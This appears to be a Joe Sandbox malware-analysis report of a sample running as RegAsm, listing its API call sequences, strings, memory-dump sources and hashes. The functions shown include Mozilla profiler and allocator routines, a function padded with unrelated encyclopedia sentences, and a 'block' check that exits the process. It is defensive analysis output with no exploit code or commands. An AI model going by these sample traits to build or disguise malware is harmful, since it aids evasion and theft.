                                                                                                                                                                                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C71F716
                                                                                                                                                                                                                                                      • Part of subcall function 6C7194D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C7194EE
                                                                                                                                                                                                                                                      • Part of subcall function 6C7194D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,?,00000000,?), ref: 6C719508
                                                                                                                                                                                                                                                      • Part of subcall function 6C6DB5A0: memcpy.VCRUNTIME140(?,?,?,?,00000000), ref: 6C6DB5E0
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71F739
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C75F4B8), ref: 6C71F746
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71F793
                                                                                                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,6C75385B,00000002,?,?,?,?,?), ref: 6C71F829
                                                                                                                                                                                                                                                    • free.MOZGLUE(?,?,00000000,?), ref: 6C71F84C
                                                                                                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?," attempted to re-register as ",0000001F,?,00000000,?), ref: 6C71F866
                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6C71FA0C
                                                                                                                                                                                                                                                      • Part of subcall function 6C6E5E60: moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,00000000,?,?,?,6C71F968), ref: 6C6E5E8C
                                                                                                                                                                                                                                                      • Part of subcall function 6C6E5E60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C6E5E9D
                                                                                                                                                                                                                                                      • Part of subcall function 6C6E5E60: GetCurrentThreadId.KERNEL32 ref: 6C6E5EAB
                                                                                                                                                                                                                                                      • Part of subcall function 6C6E5E60: GetCurrentThreadId.KERNEL32 ref: 6C6E5EB8
                                                                                                                                                                                                                                                      • Part of subcall function 6C6E5E60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C6E5ECF
                                                                                                                                                                                                                                                      • Part of subcall function 6C6E5E60: moz_xmalloc.MOZGLUE(00000024), ref: 6C6E5F27
                                                                                                                                                                                                                                                      • Part of subcall function 6C6E5E60: moz_xmalloc.MOZGLUE(00000004), ref: 6C6E5F47
                                                                                                                                                                                                                                                      • Part of subcall function 6C6E5E60: GetCurrentProcess.KERNEL32 ref: 6C6E5F53
                                                                                                                                                                                                                                                      • Part of subcall function 6C6E5E60: GetCurrentThread.KERNEL32 ref: 6C6E5F5C
                                                                                                                                                                                                                                                      • Part of subcall function 6C6E5E60: GetCurrentProcess.KERNEL32 ref: 6C6E5F66
                                                                                                                                                                                                                                                      • Part of subcall function 6C6E5E60: DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6C6E5F7E
                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6C71F9C5
                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6C71F9DA
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • [D %d/%d] profiler_register_thread(%s), xrefs: 6C71F71F
                                                                                                                                                                                                                                                    • [I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s, xrefs: 6C71F9A6
                                                                                                                                                                                                                                                    • " attempted to re-register as ", xrefs: 6C71F858
                                                                                                                                                                                                                                                    • Thread , xrefs: 6C71F789
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Current$Thread$ExclusiveLockfree$getenvmoz_xmallocstrlen$AcquireD@std@@MarkerProcessReleaseTextU?$char_traits@V?$allocator@V?$basic_string@_getpid$BlockBufferCategory@1@$$D@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@DuplicateHandleIndex@1@Init_thread_footerMarker@Marker@markers@01@Marker@markers@baseprofiler@mozilla@@Now@Options@1@ProfileProfilerStamp@mozilla@@StringTimeV12@_View@__acrt_iob_func__stdio_common_vfprintfmemcpy
                                                                                                                                                                                                                                                    • String ID: " attempted to re-register as "$Thread $[D %d/%d] profiler_register_thread(%s)$[I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s
                                                                                                                                                                                                                                                    • API String ID: 882766088-1834255612
                                                                                                                                                                                                                                                    • Opcode ID: 229a1a48eba098f9c5a3340d285666a564778dff51cb11aa02c09aa5c4b5c0cd
                                                                                                                                                                                                                                                    • Instruction ID: b18a07cf0a33956cf00611a9b0ce72f3e54bcec32f2d6b20da14c1162074d79b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 229a1a48eba098f9c5a3340d285666a564778dff51cb11aa02c09aa5c4b5c0cd
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A58128716083009FD700DF24C944BAABBB5FFC5308F89452DE85597B51EB30E949CBA6
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,?,00000000,?,6C70F710,?,00000039,00000000,?,6C72138F,?,?,?), ref: 6C71945E
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING,?,?,00000000,?,6C70F710,?,00000039,00000000,?,6C72138F,?,?,?), ref: 6C719470
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING,?,?,?,00000000,?,6C70F710,?,00000039,00000000,?,6C72138F,?,?,?), ref: 6C719482
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: __Init_thread_footer.LIBCMT ref: 6C71949F
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71EE60
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C75F4B8), ref: 6C71EE6D
                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C75F4B8), ref: 6C71EE92
                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C71EEA5
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 6C71EEB4
                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6C71EEBB
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71EEC7
                                                                                                                                                                                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C71EECF
                                                                                                                                                                                                                                                      • Part of subcall function 6C71DE60: GetCurrentThreadId.KERNEL32 ref: 6C71DE73
                                                                                                                                                                                                                                                      • Part of subcall function 6C71DE60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,6C74FEF3,?,?,?,?,?,?,00000000), ref: 6C71DE7B
                                                                                                                                                                                                                                                      • Part of subcall function 6C71DE60: ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000), ref: 6C71DEB8
                                                                                                                                                                                                                                                      • Part of subcall function 6C71DE60: free.MOZGLUE(00000000), ref: 6C71DEFE
                                                                                                                                                                                                                                                      • Part of subcall function 6C71DE60: ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6C71DF38
                                                                                                                                                                                                                                                      • Part of subcall function 6C70CBE8: GetCurrentProcess.KERNEL32(?,6C6D31A7), ref: 6C70CBF1
                                                                                                                                                                                                                                                      • Part of subcall function 6C70CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6D31A7), ref: 6C70CBFA
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71EF1E
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C75F4B8), ref: 6C71EF2B
                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C75F4B8), ref: 6C71EF59
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71EFB0
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C75F4B8), ref: 6C71EFBD
                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C75F4B8), ref: 6C71EFE1
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71EFF8
                                                                                                                                                                                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C71F000
                                                                                                                                                                                                                                                      • Part of subcall function 6C7194D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C7194EE
                                                                                                                                                                                                                                                      • Part of subcall function 6C7194D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,?,00000000,?), ref: 6C719508
                                                                                                                                                                                                                                                    • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C71F02F
                                                                                                                                                                                                                                                      • Part of subcall function 6C71F070: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C71F09B
                                                                                                                                                                                                                                                      • Part of subcall function 6C71F070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C71F0AC
                                                                                                                                                                                                                                                      • Part of subcall function 6C71F070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C71F0BE
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • [I %d/%d] profiler_pause, xrefs: 6C71F008
                                                                                                                                                                                                                                                    • [I %d/%d] profiler_stop, xrefs: 6C71EED7
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CurrentThread$ExclusiveLock$Release$AcquireTime_getpidgetenv$ProcessStampV01@@Value@mozilla@@free$?profiler_time@baseprofiler@mozilla@@BufferCloseEnterExit@mozilla@@HandleInit_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@Now@ObjectProfilerRegisterSingleStamp@mozilla@@TerminateV12@_Wait__acrt_iob_func__stdio_common_vfprintf
                                                                                                                                                                                                                                                    • String ID: [I %d/%d] profiler_pause$[I %d/%d] profiler_stop
                                                                                                                                                                                                                                                    • API String ID: 16519850-1833026159
                                                                                                                                                                                                                                                    • Opcode ID: 7e6943bf13dd5e5c94f8a2a54fc80c4749b44e470e8bdfc1f8d10e13de1e2ded
                                                                                                                                                                                                                                                    • Instruction ID: 8bc8a8edd98e0ea87bf4c6890ae376ca36b6d0baaedabcdc5b08bb707ca03d20
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7e6943bf13dd5e5c94f8a2a54fc80c4749b44e470e8bdfc1f8d10e13de1e2ded
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D65107357082149FEB406BA4D50C7B677B8EB46318F98053AED2583F80DF716949C7A2
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C75E804), ref: 6C70D047
                                                                                                                                                                                                                                                    • GetSystemInfo.KERNEL32(?), ref: 6C70D093
                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C70D0A6
                                                                                                                                                                                                                                                    • GetEnvironmentVariableA.KERNEL32(MALLOC_OPTIONS,6C75E810,00000040), ref: 6C70D0D0
                                                                                                                                                                                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(6C75E7B8,00001388), ref: 6C70D147
                                                                                                                                                                                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(6C75E744,00001388), ref: 6C70D162
                                                                                                                                                                                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(6C75E784,00001388), ref: 6C70D18D
                                                                                                                                                                                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(6C75E7DC,00001388), ref: 6C70D1B1
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CountCriticalInitializeSectionSpin$AcquireEnvironmentExclusiveInfoInit_thread_footerLockSystemVariable
                                                                                                                                                                                                                                                    • String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()
                                                                                                                                                                                                                                                    • API String ID: 2957312145-326518326
                                                                                                                                                                                                                                                    • Opcode ID: 742d92352639e210bda072aaf0a7cf1ccac18de0dead75dcb28129e8b4fa746d
                                                                                                                                                                                                                                                    • Instruction ID: e5c4b005ea908f92b24985169f55ce5891bfd00b6625307a1c4c4ca067b65fb4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 742d92352639e210bda072aaf0a7cf1ccac18de0dead75dcb28129e8b4fa746d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A781E2B0B043089FEB008F79CA54B6937F5EB26308F944939E90197B80DF79A805CBD5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • K32EnumProcessModules.KERNEL32(000000FF,00000000,00000000,?), ref: 6C6E8007
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(?,000000FF,00000000,00000000,?), ref: 6C6E801D
                                                                                                                                                                                                                                                      • Part of subcall function 6C6ECA10: malloc.MOZGLUE(?), ref: 6C6ECA26
                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000,?,?), ref: 6C6E802B
                                                                                                                                                                                                                                                    • K32EnumProcessModules.KERNEL32(000000FF,00000000,?,?,?,?,?,?), ref: 6C6E803D
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000104,000000FF,00000000,?,?,?,?,?,?), ref: 6C6E808D
                                                                                                                                                                                                                                                      • Part of subcall function 6C6ECA10: mozalloc_abort.MOZGLUE(?), ref: 6C6ECAA2
                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000,00000104,?,?,?,?,?), ref: 6C6E809B
                                                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6C6E80B9
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 6C6E80DF
                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6E80ED
                                                                                                                                                                                                                                                    • wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6E80FB
                                                                                                                                                                                                                                                    • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6E810D
                                                                                                                                                                                                                                                    • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 6C6E8133
                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000,000000FF,00000000,?,?,?,?,?,?), ref: 6C6E8149
                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?), ref: 6C6E8167
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 6C6E817C
                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6E8199
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: free$memsetmoz_xmalloc$EnumModulesProcess$ErrorFileLastModuleNamemallocmozalloc_abortwcscpy_s
                                                                                                                                                                                                                                                    • String ID: 0>ql
                                                                                                                                                                                                                                                    • API String ID: 2721933968-2377812707
                                                                                                                                                                                                                                                    • Opcode ID: 77d31d1058371c05c9cbc9f8f0bddc2ae182e102349188e48c5089347d93bd09
                                                                                                                                                                                                                                                    • Instruction ID: 179ff079b9f5e100986d335c232f20b414dd6d01d41d04762ada70dfdd38dfe7
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 77d31d1058371c05c9cbc9f8f0bddc2ae182e102349188e48c5089347d93bd09
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1B51A4B2E052145BDB00DBA9DC849EFBBB9AF4D324F144126E815E7750E730DD058BA5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,?,?,?,?,0000000F,004180DB), ref: 004022A2
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(Browns Lake derives its name from Henry Brown, a pioneer settler.,?,?,?,0000000F,004180DB), ref: 004022CA
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(Tiffany Alexandra Brymer (born January 21, 1981) is an American former tennis player.,?,?,?,0000000F,004180DB), ref: 004022D1
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(Andrea Robin Wood (born March 2, 1973) is an American attorney serving as a United States district judge of the United States District Court for the Northern District of Illinois.,?,?,?,0000000F,004180DB), ref: 004022D8
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(Richard Marston (1847?1917) was an English scenic designer who had a prominent career as a designer for Broadway productions from the 1860s into the early 20th century.,?,?,?,0000000F,004180DB), ref: 004022DF
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?,?,?,?,0000000F,004180DB), ref: 004022E7
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(Cristina Garmendia y Mendiz?bal (born 1962 in San Sebasti?n) is a Spanish biologist and businesswoman.,?,?,?,0000000F,004180DB), ref: 00402304
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(Kosse is a town in southern Limestone County, Texas, United States. The population was 464 at the 2010 census,?,?,?,0000000F,004180DB), ref: 0040230B
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(The 2017 Argentina Open was a men's tennis tournament played on outdoor clay courts.,?,?,?,0000000F,004180DB), ref: 0040231B
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(Vigia is a municipality in the northeastern part of the state of Par?, Brazil. The town was founded on 16 January 1616.,?,?,?,0000000F,004180DB), ref: 00402322
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • Richard Marston (1847?1917) was an English scenic designer who had a prominent career as a designer for Broadway productions from the 1860s into the early 20th century., xrefs: 004022DA
                                                                                                                                                                                                                                                    • Vigia is a municipality in the northeastern part of the state of Par?, Brazil. The town was founded on 16 January 1616., xrefs: 0040231D
                                                                                                                                                                                                                                                    • Andrea Robin Wood (born March 2, 1973) is an American attorney serving as a United States district judge of the United States District Court for the Northern District of Illinois., xrefs: 004022D3
                                                                                                                                                                                                                                                    • Browns Lake derives its name from Henry Brown, a pioneer settler., xrefs: 004022C5
                                                                                                                                                                                                                                                    • The 2017 Argentina Open was a men's tennis tournament played on outdoor clay courts., xrefs: 00402316
                                                                                                                                                                                                                                                    • Cristina Garmendia y Mendiz?bal (born 1962 in San Sebasti?n) is a Spanish biologist and businesswoman., xrefs: 004022F4
                                                                                                                                                                                                                                                    • Tiffany Alexandra Brymer (born January 21, 1981) is an American former tennis player., xrefs: 004022CC
                                                                                                                                                                                                                                                    • Kosse is a town in southern Limestone County, Texas, United States. The population was 464 at the 2010 census, xrefs: 00402306
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrlen$AllocLocal
                                                                                                                                                                                                                                                    • String ID: Andrea Robin Wood (born March 2, 1973) is an American attorney serving as a United States district judge of the United States District Court for the Northern District of Illinois.$Browns Lake derives its name from Henry Brown, a pioneer settler.$Cristina Garmendia y Mendiz?bal (born 1962 in San Sebasti?n) is a Spanish biologist and businesswoman.$Kosse is a town in southern Limestone County, Texas, United States. The population was 464 at the 2010 census$Richard Marston (1847?1917) was an English scenic designer who had a prominent career as a designer for Broadway productions from the 1860s into the early 20th century.$The 2017 Argentina Open was a men's tennis tournament played on outdoor clay courts.$Tiffany Alexandra Brymer (born January 21, 1981) is an American former tennis player.$Vigia is a municipality in the northeastern part of the state of Par?, Brazil. The town was founded on 16 January 1616.
                                                                                                                                                                                                                                                    • API String ID: 2140729754-378077645
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 6C6D31C0: LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6C6D3217
                                                                                                                                                                                                                                                      • Part of subcall function 6C6D31C0: GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6C6D3236
                                                                                                                                                                                                                                                      • Part of subcall function 6C6D31C0: FreeLibrary.KERNEL32 ref: 6C6D324B
                                                                                                                                                                                                                                                      • Part of subcall function 6C6D31C0: __Init_thread_footer.LIBCMT ref: 6C6D3260
                                                                                                                                                                                                                                                      • Part of subcall function 6C6D31C0: ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6C6D327F
                                                                                                                                                                                                                                                      • Part of subcall function 6C6D31C0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C6D328E
                                                                                                                                                                                                                                                      • Part of subcall function 6C6D31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C6D32AB
                                                                                                                                                                                                                                                      • Part of subcall function 6C6D31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C6D32D1
                                                                                                                                                                                                                                                      • Part of subcall function 6C6D31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C6D32E5
                                                                                                                                                                                                                                                      • Part of subcall function 6C6D31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C6D32F7
                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C6E9675
                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C6E9697
                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C6E96E8
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C6E9707
                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C6E971F
                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C6E9773
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C6E97B7
                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32 ref: 6C6E97D0
                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32 ref: 6C6E97EB
                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C6E9824
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: LibraryTime$StampV01@@Value@mozilla@@$AddressFreeInit_thread_footerLoadProc$ErrorLastStamp@mozilla@@$Creation@Now@ProcessV12@V12@_
                                                                                                                                                                                                                                                    • String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
                                                                                                                                                                                                                                                    • API String ID: 3361784254-3880535382
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(00000000,block,00000000,?,00417B94), ref: 00412688
                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00412693
                                                                                                                                                                                                                                                    • strtok_s.MSVCRT ref: 004126AA
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExitProcessstrtok_s
                                                                                                                                                                                                                                                    • String ID: block
                                                                                                                                                                                                                                                    • API String ID: 3407564107-2199623458
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

